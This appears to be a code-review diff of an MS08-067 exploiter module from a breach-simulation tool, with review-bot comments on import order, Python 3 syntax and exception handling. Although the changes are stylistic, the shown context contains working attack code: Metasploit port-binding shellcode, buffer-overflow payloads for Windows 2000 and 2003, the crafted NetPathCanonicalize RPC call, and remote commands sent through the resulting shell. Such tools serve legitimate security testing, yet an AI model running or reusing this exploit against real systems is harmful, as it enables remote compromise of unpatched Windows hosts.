diff --git a/chaos_monkey/exploit/win_ms08_067.py b/chaos_monkey/exploit/win_ms08_067.py index 7213aed62..3a15d135e 100644 --- a/chaos_monkey/exploit/win_ms08_067.py +++ b/chaos_monkey/exploit/win_ms08_067.py @@ -9,34 +9,35 @@ import sys import time import socket -from enum import IntEnum from logging import getLogger -from model.host import VictimHost -from model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS -from . import HostExploiter + +from enum import IntEnum + from exploit.tools import SmbTools, get_target_monkey -from network.tools import check_port_tcp +from model import DROPPER_CMDLINE_WINDOWS, MONKEY_CMDLINE_WINDOWS +from model.host import VictimHost from network import SMBFinger +from network.tools import check_port_tcp from tools import build_monkey_commandline +from . import HostExploiter try: from impacket import smb from impacket import uuid - #from impacket.dcerpc import dcerpc + # from impacket.dcerpc import dcerpc from impacket.dcerpc.v5 import transport from impacket.smbconnection import SessionError as SessionError1 from impacket.smb import SessionError as SessionError2 from impacket.smb3 import SessionError as SessionError3 -except ImportError, exc: +except ImportError as exc: print str(exc) print 'Install the following library to make this script work' print 'Impacket : http://oss.coresecurity.com/projects/impacket.html' print 'PyCrypto : http://www.amk.ca/python/code/crypto.html' sys.exit(1) - LOG = getLogger(__name__) - + # Portbind shellcode from metasploit; Binds port to TCP port 4444 SHELLCODE = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" SHELLCODE += "\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9" 
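Review bot: The regrouped import block leaves `from enum import IntEnum` isolated between two blank lines, although it is a standard-library import like `sys`, `time`, `socket` and `logging` and belongs in the first group, e.g. directly under `from logging import getLogger`, with the absolute project imports (`exploit.tools`, `model`, `network`, `tools`) as the second group and `from . import HostExploiter` as the third. The `except ImportError as exc:` change is the Python 2.6+/3 spelling, but the `print str(exc)` lines that follow it in the same guard are still Python 2 print statements, so the module remains Python 2-only and the modernisation is only half applied; `print(str(exc))` and friends would make it consistent. The guard also still ends in `sys.exit(1)`, which terminates whatever process imports this exploiter instead of raising and letting the caller decide; that is pre-existing behaviour, but worth noting while the block is being touched.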
@@ -61,8 +62,7 @@ SHELLCODE += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8" SHELLCODE += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79" SHELLCODE += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6" SHELLCODE += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9" - - + # Payload for Windows 2000 target PAYLOAD_2000 = '\x41\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00\x2e\x00\x2e\x00\x5c\x00' PAYLOAD_2000 += '\x41\x41\x41\x41\x41\x41\x41\x41' @@ -76,7 +76,7 @@ PAYLOAD_2000 += '\x43\x43\x43\x43\x43\x43\x43\x43' PAYLOAD_2000 += '\x43\x43\x43\x43\x43\x43\x43\x43' PAYLOAD_2000 += '\xeb\xcc' PAYLOAD_2000 += '\x00\x00' - + # Payload for Windows 2003[SP2] target PAYLOAD_2003 = '\x41\x00\x5c\x00' PAYLOAD_2003 += '\x2e\x00\x2e\x00\x5c\x00\x2e\x00' @@ -95,11 +95,11 @@ PAYLOAD_2003 += '\xba\x77\xf9\x75\xbd\x77\x00\x00' class WindowsVersion(IntEnum): Windows2000 = 1 Windows2003_SP2 = 2 - - + + class SRVSVC_Exploit(object): TELNET_PORT = 4444 - + def __init__(self, target_addr, os_version=WindowsVersion.Windows2003_SP2, port=445): self._port = port self._target = target_addr 
@@ -110,33 +110,33 @@ class SRVSVC_Exploit(object): The port on which the Telnet service will listen. """ - + return SRVSVC_Exploit.TELNET_PORT - + def start(self): """start() -> socket Exploit the target machine and return a socket connected to it's listening Telnet service. """ - + target_rpc_name = "ncacn_np:%s[\\pipe\\browser]" % self._target - + LOG.debug("Initiating exploit connection (%s)", target_rpc_name) self._trans = transport.DCERPCTransportFactory(target_rpc_name) self._trans.connect() - + LOG.debug("Connected to %s", target_rpc_name) - + self._dce = self._trans.DCERPC_class(self._trans) self._dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0'))) - + dce_packet = self._build_dce_packet() - self._dce.call(0x1f, dce_packet) #0x1f (or 31)- NetPathCanonicalize Operation - + self._dce.call(0x1f, dce_packet) # 0x1f (or 31)- NetPathCanonicalize Operation + LOG.debug("Exploit sent to %s successfully...", self._target) LOG.debug("Target machine should be listening over port %d now", self.get_telnet_port()) - + sock = socket.socket() sock.connect((self._target, self.get_telnet_port())) return sock @@ -162,7 +162,7 @@ class SRVSVC_Exploit(object): dce_packet += '\x00\x00\x00\x00\x02\x00\x00\x00' dce_packet += '\x5c\x00\x00\x00\x01\x00\x00\x00' dce_packet += '\x01\x00\x00\x00' - + return dce_packet @@ -186,7 +186,7 @@ class Ms08_067_Exploiter(HostExploiter): smb_finger = SMBFinger() if smb_finger.get_host_fingerprint(host): return host.os.get('type') in self._target_os_type and \ - host.os.get('version') in self._windows_versions.keys() + host.os.get('version') in self._windows_versions.keys() return False def exploit_host(self, host, depth=-1, src_path=None): @@ -218,7 +218,7 @@ class Ms08_067_Exploiter(HostExploiter): LOG.debug("Exploited into %r using MS08-067", host) exploited = True break - except Exception, exc: + except Exception as exc: LOG.debug("Error exploiting victim %r: (%s)", host, exc) continue 
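Review bot: In the `-218,7` hunk the retry loop's new `except Exception as exc:` still logs only the exception message at debug level, so the traceback of each failed attempt is lost and a programming error in the exploit path is indistinguishable from a target that simply did not respond; `LOG.debug("Error exploiting victim %r: (%s)", host, exc, exc_info=True)` would keep the traceback without raising the log level. The other hunks on this line (`-110,33`, `-162,7`, `-186,7`) are whitespace and comment-spacing changes only. The enclosing `exploit_host` method starts and ends outside the hunk.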
@@ -256,15 +256,15 @@ class Ms08_067_Exploiter(HostExploiter): build_monkey_commandline(host, depth - 1) try: - sock.send("start %s\r\n" % (cmdline, )) - sock.send("net user %s /delete\r\n" % (self._config.ms08_067_remote_user_add, )) - except Exception, exc: + sock.send("start %s\r\n" % (cmdline,)) + sock.send("net user %s /delete\r\n" % (self._config.ms08_067_remote_user_add,)) + except Exception as exc: LOG.debug("Error in post-debug phase while exploiting victim %r: (%s)", host, exc) return False finally: try: sock.close() - except: + except socket.error: pass LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
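Review bot: Narrowing the bare `except:` around `sock.close()` to `except socket.error:` is an improvement, but the handler still discards the error silently; `except socket.error as exc: LOG.debug("Error closing socket to %r: (%s)", host, exc)` keeps the same best-effort cleanup while leaving a trace in the log. On Python 3 `socket.error` is an alias of `OSError`, so the narrowed clause stays valid if the module is ever ported, which is consistent with the `as exc` changes elsewhere in this commit. The enclosing method starts before this hunk.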